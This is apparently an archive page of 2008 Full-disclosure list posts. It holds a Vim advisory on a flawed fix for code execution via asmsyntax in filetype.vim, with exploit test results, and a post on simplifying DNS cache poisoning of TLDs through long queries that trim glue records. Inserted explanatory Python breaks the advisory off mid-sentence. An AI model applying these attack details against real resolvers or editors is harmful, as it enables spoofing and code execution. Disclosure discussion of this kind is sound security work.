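    Only files marked 'ok' should be handed to dpkg -i.
    """
    results = {}
    for name, (size, md5) in expected.items():
        path = os.path.join(directory, name)
        if not os.path.exists(path):
            results[name] = "missing"
        elif verify_file(path, size, md5):
            results[name] = "ok"
        else:
            results[name] = "mismatch"
    return results


def demo(tamper=False):
    """Constructed run: the sample .deb is present, the .dsc is not.

    With tamper=True one byte of the sample is altered (same length), so the
    size check alone would pass and only the digest catches it.
    """
    expected = parse_dsa_files(DSA_EXCERPT)
    payload = b"hellO\n" if tamper else b"hello\n"
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "sample_1.0-1_all.deb"), "wb") as f:
            f.write(payload)
        return check_downloads(d, expected)


if __name__ == "__main__":
    print(demo())
    print(demo(tamper=True))
```

The dict `check_downloads` returns is the gate for the manual install step: run `dpkg -i` only on names marked "ok", and treat "mismatch" as a re-download, never as something to install anyway.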

Re: [Full-disclosure] Is the security industry like a lemon market?

2008-07-23 Thread Daniel Guido
This should play nicer with some auto-linking code: http://isis.poly.edu/csaw/

Sorry about that!

--
Dan Guido



[Full-disclosure] Is the security industry like a lemon market?

2008-07-23 Thread Daniel Guido
This pair of essays was written in 4 hours the night before they were
due for last year's Cyber Security Awareness Week at Polytechnic
University. They were intended to answer the question, "Is the
security industry like a lemon market?" as first brought up in a Wired
article by Bruce Schneier last year [1].

We'll be hosting an essay contest and many others again this year.
Contests are for students only and registration is available at:
http://isis.poly.edu/csaw.

Feel free to contact me for more information.

--
Dan Guido

[1] http://www.schneier.com/blog/archives/2007/04/a_security_mark.html


---


Alicia Bozyk
CSAW Essay
November 18, 2007

Trends in Security Products

Due to information asymmetries, consumers are unable to identify what
security is and how they should be protected. They are easily swayed
by market driven trends that recur on a regular basis. Such trends are
not necessarily merit based and fail to solve the security problems
that consumers face in meaningful ways. This problem has resulted in
numerous products in the form of firewalls, antivirus software,
intrusion detection systems (IDS), and anti-spyware and malware
software. These products receive a lot of attention and are marketed
as solving security problems. However, the same threats endure even
when a user is fully covered by such mechanisms. The success of such
security products on the market is a result of marketing and
advertising, the lack of reliability provided by authoritative
sources, and a lack of focus by industry professionals to create a
comprehensive approach to improving computer security. The security
industry is flooded with poor quality software products which are
driven by rapidly changing security trends rather than the real needs
of consumers.

Any new security trend introduces an influx of security offerings to
the market. The consumer market for security software reached $1.6
billion last year, according to the research company IDC. The consumer
ranges from large institutions and corporations to the owners of home
computers. Since the market share of the security industry is so large
and its targets so varied, there are considerable opportunities to
create new products as trends in the industry shift. Security
companies spend a large amount of money on marketing and advertising
campaigns for these new offerings. The goal is to convince consumers
that they are not safe unless they purchase a new product, or upgrade
their existing products to include new features. As a result,
companies and individuals are constantly purchasing new security
products and spending more money to improve the ones that they already
have.  If a consumer is unwilling to invest in products that protect
against the newest threats, they run the risk of appearing negligent.
However, new offerings cannot guarantee security and may not provide
much added value. Trend driven advertising frightens consumers into
new purchases, adding more incentive for producers to push out more
and more products.

Another common flaw in the security industry is that many average
consumers have little or no knowledge of computer security and what it
means for them. However, most consumers are convinced that they need
to take some action to safeguard themselves against threats. As a
result, most try at least one of the following two methods. A consumer
can scour the internet for reports and reviews on security products.
They can also turn to sources of authority to provide the answers for
their security needs. Both methods will likely result in a consumer
making unfortunate decisions about a security product that is driven
by recent trends in the security industry. If a consumer tries to do
their own research, it is difficult to find clear answers since they
may not know what to look for and must sift through a lot of
misleading advertising. If a user simply turns to an authoritative
source, they might accept a bad product. For example, Columbia
University Information Technology recommends that all students and
faculty members install Symantec Anti-Virus software on their personal
computers. Many students take this suggestion to mean that as long as
they have this software installed, they are safe. However it is common
knowledge among security professionals and hackers alike that
anti-virus is not a silver bullet, anti-virus does not protect against
all security threats, and anti-virus provides questionable value to
begin with. The following diagram is taken from a publication by
VirusTotal, an organization which tests the efficacy of all major
anti-virus brands to detect new malicious code.

[blue: 31692, red: 2]
Failures in Detection (Last 24 Hours)
Red: Infected files not detected by at least one antivirus engine.
Blue: Infected files detected by all antivirus engines.

This diagram is evidence that even the threats anti-virus claims to
protect against, it cannot in many cases. Most consumers do not have
the knowledge of th

[Full-disclosure] Vim: Flawed Fix of Arbitrary Code Execution Vulnerability in filetype.vim

2008-07-23 Thread Jan Minář
1. SUMMARY

Product  : Vim -- Vi IMproved
Version  : Tested with Vim 7.2b.10, filetype.vim 2008-07-17
Impact   : Arbitrary code execution
Wherefrom: Local and remote
CVE  : CVE-2008-2712
Original : http://www.rdancer.org/vulnerablevim-filetype.vim.updated.html
   http://www.rdancer.org/vulnerablevim-filetype.vim.updated.patch
   http://www.rdancer.org/vulnerablevim-latest.tar.bz2

This is an update of a previous advisory[1].  Vim patch 7.1.300 which
purported to fix the ``filetype.vim'' vulnerability did not fix the
vulnerability.


2. BACKGROUND

  ``Vim is an almost compatible version of the UNIX editor Vi.  Many new
features have been added: multi-level undo, syntax highlighting,
command line history, on-line help, spell checking, filename
completion, block operations, etc.''

-- Vim README.txt

  ``Problem:Value of asmsyntax argument isn't checked for valid
characters.
Solution:   Only accepts letters and digits.''

-- Vim Patch 7.1.300[2]

3. VULNERABILITY

This is the ``filetype.vim'' vulnerability, described in the sections
3.4.2.1. and 3.4.2.2. of the original advisory[1].  It can lead to
arbitrary code execution upon Vim opening a crafted file.  The file can
be either local or remote, and the filename must match one of the
following glob patterns:

*.asm
*.s
*.S
*.a
*.A
*.mac
*.lst (with the exception of /boot/grub/menu.lst)
*.i


4. PURPORTED FIX

Quoting the original advisory[1]:

  ``[A]bsent sanitization on line 190, followed by the execute
statements at filetype.vim lines 181 or 1267:

  ``The code looks in the first five lines [of the file being opened]
for a statement of the form ``asmsyntax=FOO'', where FOO can contain
any characters except Tab and Space.  FOO is then executed, without
any sanitization.''

   187    let head = " ".getline(1)." ".getline(2)." ".getline(3)." ".getline(4).
   188          \" ".getline(5)." "
   189    if head =~ '\sasmsyntax=\S\+\s'
  *190      let b:asmsyntax = substitute(head, '.*\sasmsyntax=\(\S\+\)\s.*','\1', "")
   [... logical flow of the code then jumps to line 181 ...]
  *181    exe "setf " . b:asmsyntax
   [... or line 1267 ...]
 *1267    exe "setf " . b:asmsyntax

Patch 7.1.300 changed the regular expression in the substitute() call on
line 190:

    let b:asmsyntax = substitute(head, '.*\sasmsyntax=\([a-zA-Z0-9]\+\)\s.*','\1', "")

This would work if substitute() were a matching function -- returning a
matching string, or an empty string if the pattern failed to match.  But
substitute() always returns its first argument -- substituting the
matching string (if any).  If the pattern fails to match, substitute()
returns its first argument as-is:

                  | pattern matches | no match
------------------+-----------------+--------------------
substitute()      | alter match     | return as-is
------------------+-----------------+--------------------
matching function | return match    | return empty string

The previous line of code (line 189) remains unchanged, leaving two
different regular expressions.  It is easy to create a payload matching
the first regular expression, but not the second one.  As a matter of
fact, the payload in the test suite[3] that accompanied the original
advisory did just that.

It may be also worth noting that the failure to sanitize the input may
not have been fatal if the ``execute'' statements on lines 181 and 1276
were updated to use the fnameescape() function to sanitize the
arguments.


5. EXPLOIT

The exploit needed a small update in order to work with the current Vim.
It produces error messages, and the exploit text is not hidden.  Making
the exploit fully compatible would be just a matter of spending some
more time.  The updated exploit is called ``filetype.vim.updated'':

---
 Test results below ---
---
Vim version 7.2b, included patches: 1-10
filetype.vim revision date: 2008 Jul 17
zip.vim version: v21
netrw.vim version: v127
---
filetype.vim
  strong  : EXPLOIT FAILED
  weak: EXPLOIT FAILED
filetype.vim.updated
-->   strong  : VULNERABLE
-->   weak: VULNERABLE
tarplugin : EXPLOIT FAILED
tarplugin.updated: EXPLOIT FAILED
tarplugin.v2: EXPLOIT FAILED
zipplugin : EXPLOIT FAILED
zipplugin.v2: EXPLOIT FAILED
xpm.vim
  xpm : EXPLOIT FAILED
  xpm2: EXPLOIT FAILED
  remote  : EXPLOIT FAILED
gzip_vim  : EXPLOIT FAILED
netrw : EXPLOIT FAILED
netrw.v2  : EXPLOIT FAILED
netrw.v3  : EXPLOIT FAILED
netrw.v4  : EXPLOIT FAILED
netrw.v5  : VULNERABLE
shellescape: EXPLOIT FAILED


6. PATCH

A copy of a patch that fixes this vulnerability can 
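
The substitute()-versus-matching-function point in section 4 above, as an added example that is not part of the advisory or of Vim's own code: a Python transcription of the two patterns, run over constructed sample "heads" (filetype.vim joins the first five lines of the file with spaces; the `asmsyntax=` values here are illustrative only). Python's `re.sub` behaves exactly like Vim's `substitute()`, returning its input unchanged when the pattern does not match, so the patched check still passes a value that satisfies the loose test on line 189 but not the strict alphanumeric pattern. The second function does what the advisory describes as a matching function: extract first, then accept the value only if the whole of it is alphanumeric.

```python
import re

# Constructed sample heads standing in for the joined first five lines.
HEAD_OK = " asmsyntax=nasm "          # a legitimate assembler name
HEAD_BAD = " asmsyntax=not-alnum "    # passes the loose check, fails the strict one
HEAD_NONE = " no assembler hint here "  # nothing to extract

# Line 189's check and patch 7.1.300's substitute() pattern, transcribed
# from Vim regex syntax to Python's.
LOOSE = re.compile(r"\sasmsyntax=(\S+)\s")
STRICT_SUB = re.compile(r".*\sasmsyntax=([a-zA-Z0-9]+)\s.*")
ALNUM = re.compile(r"[a-zA-Z0-9]+")


def extract_patched(head):
    """Mirror the patched lines 189-190 (the flawed fix).

    re.sub(), like Vim's substitute(), returns the input unchanged when the
    pattern does not match, so the strict pattern never rejects anything: a
    head that satisfies the loose check but not the strict one comes back
    verbatim, and that is the string 'exe "setf " . b:asmsyntax' would see.
    """
    if not LOOSE.search(head):
        return None                      # line 189 false: b:asmsyntax never set
    return STRICT_SUB.sub(r"\1", head, count=1)


def extract_validated(head):
    """Validation done with a matching function instead of a substitution.

    Extract the candidate value, then accept it only when the whole value is
    alphanumeric; anything else is dropped rather than passed on.
    """
    m = LOOSE.search(head)
    if m is None:
        return None
    value = m.group(1)
    return value if ALNUM.fullmatch(value) else None


def classify(head):
    """Return (patched_result, validated_result) for side-by-side comparison."""
    return extract_patched(head), extract_validated(head)


if __name__ == "__main__":
    for label, head in (("ok", HEAD_OK), ("bad", HEAD_BAD), ("none", HEAD_NONE)):
        print(label, classify(head))
```

The general lesson is the anti-pattern itself: a substitution whose no-match case returns the input is not a validator, and any "sanitize via substitute" step must be paired with an explicit match (or a positive allow-list check on the extracted value) before the result reaches an execute-style call.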

Re: [Full-disclosure] Nominate Dan Kaminsky for Most Overhyped BugPwnie Award

2008-07-23 Thread imipak
mcwidget wrote:

> Given how easy it appears to be to redirect a client to a malicious web 
> server,
>

The web != the Internet.

Think of POP and IMAP. Hmmm.
SMTP.
All those Cisco devices that still use telnet rather than SSH...

I'm /sure/ there are no SP networks whose routers don't use BGP + MD5
*and* which use unpatched or NAT'd DNS servers. Why, that's just crazy
talk.

There's still no patches (or anything else) from Checkpoint, Cisco, or
any other vendors of vulnerable NATs, AFAIK, though Vixie and Dan
Kaminsky have both said CERT are working on it.


At http://blog.wired.com/27bstroke6/2008/07/kaminsky-on-how.html , Dan
is quoted saying:

  Q: How far along are people in patching the DNS servers? Do
  you know how many have been patched?

DK: [...] We were getting some pretty good pickup on
  this patch. The last time I looked at people who were testing
  against my site it was somewhere in 30 to 40 percent ...


Is it 22:58 already?


=i
-- 
make way for history
flickering like a long-lost memory



Re: [Full-disclosure] The cat is indeed out of the bag

2008-07-23 Thread Peter Dawson
On Wed, Jul 23, 2008 at 10:57 AM, mokum von Amsterdam <[EMAIL PROTECTED]>
wrote:

>
> Are you not supposed to keep DNS issues under your hat and disclose at BH
> only?



I think that rule /Nda exists only for Dan Kaminsky .. Rest of world is
still in FD mode !!

/pd

Re: [Full-disclosure] The cat is indeed out of the bag

2008-07-23 Thread mokum von Amsterdam
On Wed, Jul 23, 2008 at 4:22 PM, Robert McKay <[EMAIL PROTECTED]> wrote:
>
>
> On Tue, Jul 22, 2008 at 3:36 AM, <[EMAIL PROTECTED]> wrote:
>>
>> from chargen 19/udp by ecopeland
>>
>> 0.
>>
>> The cat is out of the bag. Yes, Halvar Flake figured out the flaw
>> Dan Kaminsky will announce at Black Hat.
>> 1.
>
> I believe I may have found an important optimisation to this attack.
>
> Basically I observed that if you make a DNS request with a very long QNAME
> then nameservers start dropping GLUE records in order to fit the reply into
> the maximum UDP packet size.

Are you not supposed to keep DNS issues under your hat and disclose at BH only?

Cheers
-- 
Mark Andrews wrote:
> ...  I like simple tools.
This is the list for you then -- there are lots of folk meeting the
description here... --- Nick FitzGerald



Re: [Full-disclosure] The cat is indeed out of the bag

2008-07-23 Thread Robert McKay
On Tue, Jul 22, 2008 at 3:36 AM, <[EMAIL PROTECTED]> wrote:

> from chargen 19/udp by ecopeland
>
> 0.
>
> The cat is out of the bag. Yes, Halvar Flake figured out the flaw
> Dan Kaminsky will announce at Black Hat.
> 1.


I believe I may have found an important optimisation to this attack.

Basically I observed that if you make a DNS request with a very long QNAME
then nameservers start dropping GLUE records in order to fit the reply into
the maximum UDP packet size.

If you query X.root-servers.net for .whatever.com then the
reply you get from the root-servers can include as little as ONE actual GLUE
record for .COM. Now obviously .COM will be cached by almost everyone, but
the attack works on many TLDs.


Consider the following query:

[EMAIL PROTECTED]:~$ dig @a.root-servers.net.
..aaa.aaa.aaa.aa.a.csis-scrs.gc.caa

; <<>> DiG 9.3.1 <<>> @a.root-servers.net.
..aaa.aaa.aaa.aa.a.csis-scrs.gc.caa
; (2 servers found)
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9857
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 10, ADDITIONAL: 1

;; QUESTION SECTION:
;
..aaa.aaa.aaa.aa.a.csis-scrs.gc.ca.
IN A

;; AUTHORITY SECTION:
ca. 172800  IN  NS  TLD3.ULTRADNS.ORG.
ca. 172800  IN  NS  NS-EXT.ISC.ORG.
ca. 172800  IN  NS  CA01.CIRA.ca.
ca. 172800  IN  NS  CA02.CIRA.ca.
ca. 172800  IN  NS  CA03.CIRA.ca.
ca. 172800  IN  NS  CA04.CIRA.ca.
ca. 172800  IN  NS  CA05.CIRA.ca.
ca. 172800  IN  NS  CA06.CIRA.ca.
ca. 172800  IN  NS  TLD1.ULTRADNS.NET.
ca. 172800  IN  NS  TLD2.ULTRADNS.NET.

;; ADDITIONAL SECTION:
CA01.CIRA.ca.   172800  IN  A   192.228.27.11

;; Query time: 137 msec
;; SERVER: 198.41.0.4#53(198.41.0.4)
;; WHEN: Wed Jul 23 15:16:14 2008
;; MSG SIZE  rcvd: 505


It always returns CA01.CIRA.ca. as the only GLUE record for .CA - No matter
which of the X.root-servers.net is used. It seems to me that this should
greatly simplify the task of gaining NS control of a TLD as you know exactly
which of the nameservers to spoof your replies from.

Rob.

Re: [Full-disclosure] Nominate Dan Kaminsky for Most Overhyped Bug Pwnie Award

2008-07-23 Thread mcwidget
>
> Hi Sandy Vagina,
>
> Looks like they did a U-turn after realising how over hyped the bug
> actually is.
>
> n3td3v
>

So the Cat's out of the bag and the bug's public.

http://blog.wired.com/27bstroke6/2008/07/kaminsky-on-how.html
http://blog.invisibledenizen.org/2008/07/kaminskys-dns-issue-accidentally-leaked.html

Still think this deserves a nomination?

Hype.  Excessive, exaggerated publicity, to give more attention than it
deserves.
http://www.google.co.uk/search?q=define%3Ahype

Given how easy it appears to be to redirect a client to a malicious web
server, is this publicity excessive?  It's clearly had the most publicity
but I don't think it's that clean cut.

This is an awkward one as Mom and Pop web surfers sitting at home are the
ones that are vulnerable here if they're redirected and phished, yet they
cannot patch this and easily protect themselves through their normal methods
such as Windows Update or IE7's phishing filter (correct me if I'm wrong
here but I think this will report the site as OK) - they're relying on other
people patching this.  In their shoes, I'd be screaming for publicity for
this to make sure other people are patching to keep me protected.

Re: [Full-disclosure] AFK from fool-disclosure

2008-07-23 Thread Slythers Bro
afk-47 is the tool
don't make act the motherfuckin fool

Re: [Full-disclosure] Nominate Dan Kaminsky for Most Overhyped Bug Pwnie Award

2008-07-23 Thread n3td3v
On Fri, Jul 11, 2008 at 9:22 PM, Sandy Vagina <[EMAIL PROTECTED]> wrote:
>
> n3td3v wrote:
> > Please nominate Mr.DNS aka Dan Kaminsky for Most Overhyped Bug on the
> > Pwnie Awards 2008.
>
> Perhaps if you bothered to read anywhere close to as much as you
> write, you would have seen that Dino, one of the judges, specifically
> disqualified this bug from the Pwnies for being too awesome:
>
> http://blog.trailofbits.com/2008/07/09/dan-kaminsky-disqualified-from-most-overhyped-bug-pwnie/
>

Hi Sandy Vagina,

Looks like they did a U-turn after realising how overhyped the bug actually is.

Nominees

"
Unspecified DNS cache poisoning vulnerability (CVE-2008-1447)

Dan Kaminsky

Dan Kaminsky is credited with discovering some unspecified
vulnerabilities in DNS that allow for cache poisoning on a massive
the-intarweb-tubes-will-burst-and-flood-your-basement scale. There has
been massive media attention over this vulnerability and a large
amount of backlash in the security community over the lack of details.
When the full details of the vulnerability are revealed at BlackHat,
the masses will decide whether the hype and secrecy were worth it.
And, more importantly, the Pwnie Judges will vote on whether Dan gets
the Pwnie for Most Overhyped Bug.

"

http://pwnie-awards.org/2008/awards.html#overhypedbug

All the best,

n3td3v



Re: [Full-disclosure] AFK from fool-disclosure

2008-07-23 Thread Anders Klixbull
we care
we really do



From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Kingcope
Kingcope
Sent: 18. juli 2008 19:14
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] AFK from fool-disclosure


I am reachable 
0nly @ two addresses:

http://www.milw0rm.com
http://www.com-winner.com

Thanks n3td3v


Signed,
KingCope



Re: [Full-disclosure] help: I need to crack my box

2008-07-23 Thread Lucio Crusca
Paul Schmehl wrote:

> So call your customer up and walk him through rebooting, going into single
> user mode and changing the password.

Ahahah, I had to walk him through typing an '@' once, and it was hard
enough...

Lucio.

